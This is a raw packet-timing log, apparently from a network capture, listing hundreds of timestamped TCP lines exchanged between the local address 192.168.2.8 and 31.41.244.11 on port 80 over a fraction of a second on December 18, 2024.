                                                                                                                                                                                          Dec 18, 2024 09:07:39.072995901 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.073071003 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.073122025 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.075016022 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.075069904 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.075802088 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.075855970 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.075901031 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.075949907 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.077964067 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.078022957 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.078083038 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.078131914 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.080195904 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.080208063 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.080243111 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.080275059 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.082113028 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.082206964 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.082282066 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.082351923 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.084371090 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.084429026 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.084475994 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.084525108 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.086781979 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.086836100 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.086925030 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.086982012 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.088149071 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.088203907 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.088287115 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.088336945 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.090024948 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.090092897 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.090190887 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.090245008 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.092045069 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.092097998 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.092437983 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.092514038 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.093857050 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.093919039 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.093972921 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.094840050 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.095909119 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.095978975 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.096120119 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.096177101 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.097671986 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.097771883 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.097816944 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.099627018 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.099714994 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.099765062 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.101540089 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.101648092 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.101655006 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.101735115 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.103472948 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.103673935 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.103698015 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.103733063 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.105345964 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.105403900 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.105413914 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.106060028 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.107242107 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.107356071 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.107366085 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.107501030 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.109204054 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.109302998 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.109333992 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.109380960 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.111372948 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.111429930 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.111476898 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.111568928 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.113014936 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.113070965 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.113161087 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.113209963 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.114940882 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.114979982 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.114995003 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.115026951 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.116836071 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.116894007 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.116909027 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.117372990 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.118670940 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.118757010 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.118758917 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.118808985 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.120655060 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.120841026 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.121167898 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.121280909 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.122467995 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.122535944 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.122618914 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.122664928 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.124459982 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.124473095 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.124526978 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.126277924 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.126332998 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.126391888 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.126460075 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.128220081 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.128400087 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.128463984 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.130114079 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.130259037 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.130398035 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.130445957 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.132028103 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.132080078 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.132194042 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.132245064 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.133999109 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.134078026 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.134121895 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.134200096 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.135993958 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.136006117 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.136055946 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.137788057 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.137825966 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.137876987 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.139602900 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.139656067 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.139750957 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.139811039 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.141624928 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.141638994 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.141686916 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.143428087 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.143496990 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.143615007 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.143663883 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.145327091 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.145443916 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.145483971 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.145692110 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.147300959 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.147351980 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.147381067 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.147413015 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.149163961 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.149205923 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.149223089 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.149251938 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.151374102 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.151385069 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.151431084 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.153136969 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.153148890 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.153187990 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.153219938 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.154880047 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.154932976 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.154944897 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.154989004 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.156735897 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.156786919 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.156817913 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.156867027 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.158699989 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.158752918 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.158778906 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.158910036 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.160571098 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.160613060 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.160623074 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.160655975 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.162458897 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.162563086 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.162678003 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.162728071 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.164418936 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.164464951 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.164501905 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.164532900 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.166368961 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.166471004 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.166574001 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.166634083 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.168351889 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.168360949 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.168404102 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.168436050 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.262964010 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.262980938 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.263140917 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.263140917 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.263768911 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.263847113 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.263899088 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.265367985 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.265382051 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.265434027 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.266907930 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.266958952 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.267029047 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.267075062 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.268496990 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.268548012 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.268564939 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.268613100 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.270078897 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.270138025 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.270214081 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.270279884 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.271662951 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.271716118 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.271856070 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.272104979 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.273154020 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.273313999 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.273356915 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.273356915 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.274729013 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.274780989 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.274939060 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.275034904 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.276201010 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.276241064 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.276253939 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.276278973 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.277726889 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.277784109 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.277827024 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.277934074 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.279160023 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.279211044 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.279285908 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.279424906 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.280653000 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.280766010 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.280774117 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.280821085 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.282126904 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.282150030 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.282176971 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.282215118 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.283627987 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.283687115 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.283752918 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.283807993 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.284970999 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.285049915 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.285084009 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.285197020 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.286365986 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.286448956 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.286973953 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.287019968 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.287797928 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.287851095 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.287861109 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.287965059 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.289181948 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.289248943 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.289269924 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.289346933 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.290554047 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.290616035 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.290646076 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.290688038 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.292026997 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.292043924 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.292095900 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.293370008 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.293389082 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.293421984 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.293457031 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.294672966 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.294725895 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.294739962 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.294789076 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.296132088 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.296143055 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.296190023 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.297367096 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.297425032 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.297472000 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.297559977 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.298969984 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.298988104 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.299036980 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.299069881 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.300096035 CET804972431.41.244.11192.168.2.8
